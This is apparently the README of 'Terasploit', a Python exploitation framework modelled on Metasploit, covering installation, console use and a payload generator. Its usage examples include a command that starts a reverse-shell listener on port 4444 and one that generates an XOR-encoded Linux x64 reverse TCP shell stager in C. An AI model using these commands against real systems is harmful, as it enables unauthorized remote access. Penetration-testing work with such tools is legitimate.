## https://sploitus.com/exploit?id=1FA88C18-E4ED-57EA-A9FC-339D74865094
# Terasploit Framework
**An opensource python exploitation framework for security researchers and red team operators.**
---
## Overview
**Terasploit Framework (TSF)** is a structured exploitation framework built entirely in Python, designed for security researchers, penetration testers, and red team operators.
Inspired by the architecture and workflow of Metasploit, TSF explores a Python-first approach - leveraging the language most dominant across modern cybersecurity tooling. Where existing frameworks are often tied to Ruby, TSF prioritises Python's ecosystem, accessibility, and integration potential.
The long-term goal is a powerful, community-driven framework that pairs Metasploit's proven workflow model with Python's flexibility.
---
## Requirements
**Python 3.13 or later** is required.
```bash
pip install -r data/requirements/reqs-extra.txt
```
---
## Installation
```bash
# Clone the repository
git clone https://github.com/0x4steroth/terasploit.git
cd terasploit
# Install extras
pip install -r data/requirements/reqs-extra.txt
# Make entry points executable
chmod +x teraconsole terax terasm
# No package installation step is required. The framework adds its own root to `sys.path` at startup.
./teraconsole
```
### System Installation
```bash
# Clone the repository
git clone https://github.com/0x4steroth/terasploit.git
cd terasploit
# Install via pip - be careful with '--break-system-packages'
python3 -m pip install -e . --break-system-packages
# Execute
teraconsole
```
---
## Usage
### `teraconsole`
Launch the interactive Terasploit console:
```bash
./teraconsole [OPTIONS]
```
| Flag | Description |
|---|---|
| `-d`, `--debug` | Enable verbose/debug output |
| `-v`, `--version` | Print version and exit |
| `-q`, `--quiet` | Skip the banner |
| `-r FILE` | Execute commands from a resource (`.rc`) script |
| `-m MODULE` | Preload a module before dropping into the REPL |
| `-x "CMDs"` | Run semicolon-separated commands, then drop to REPL |
**Quick example - start a listener via command line:**
```bash
./teraconsole -q -x "use exploit/multi/handler; set LHOST 0.0.0.0; set LPORT 4444; run"
```
**Common console commands:**
```
use Load a module by path
show options Display current module options
show advanced Display advanced options
set Set an option value
run / exploit Execute the active module
sessions List active sessions
sessions -i Interact with a session
jobs List background jobs
back Unload the current module
help Show all available commands
exit / quit Exit the console
```
---
### `terax`
Standalone payload generator - mirrors the msfvenom workflow:
```bash
./terax [OPTIONS] [KEY=VALUE ...]
```
| Flag | Description |
|---|---|
| `-p ` | Payload module path to generate |
| `-f ` | Output format (`raw`, `hex`, `c`, `python`, …) |
| `-e ` | Encoder to apply |
| `-i ` | Number of encoding iterations |
| `-b ` | Bad characters to avoid (e.g. `\x00\x0a`) |
| `-s ` | Maximum payload size in bytes |
| `--nop-sled ` | Prepend N NOP bytes |
| `-o ` | Write output to file |
| `-l payloads` | List available payloads |
| `-l encoders` | List available encoders |
| `-l formats` | List available output formats |
**Example - Linux x64 reverse shell, XOR-encoded, null-free, C output:**
```bash
./terax -p payload/stagers/linux/x64/shell/reverse_tcp \
LHOST=192.168.1.10 LPORT=4444 \
-e encoder/x64/xor_dynamic \
-b '\x00' \
-f c
```
---
## Development
**Linting and formatting** via [Ruff](https://docs.astral.sh/ruff/):
```bash
ruff check . # lint
ruff check --fix . # auto-fix safe issues
ruff format . # format
```
**Type checking** via [Pyright](https://github.com/microsoft/pyright):
```bash
pyright
```
**Adding a new payload platform/architecture:**
1. Implement the shellcode under `teralibs/tsf/core/payload///`
2. Create the module file under `modules/payload////`
3. Restart or `reload` - the module is discovered automatically
**Adding a new module type:**
Follow the skeletons in [`docs/terasploit.wiki/guide/Module-Development.md`](docs/terasploit.wiki/guide/Module-Development.md) and drop the file into the correct `modules/` subdirectory.
---
## Contributing
Contributions are welcome. Please open an issue before starting work on significant changes. All modules should pass `ruff check` and `pyright` before submission.
---
## Disclaimer
Terasploit is intended exclusively for **authorized security testing and educational research**. Use against systems you do not own or lack explicit written permission to test is illegal and unethical. The authors accept no liability for misuse.
---
Built with Python · BSD-3-Clause · github.com/0x4steroth/terasploit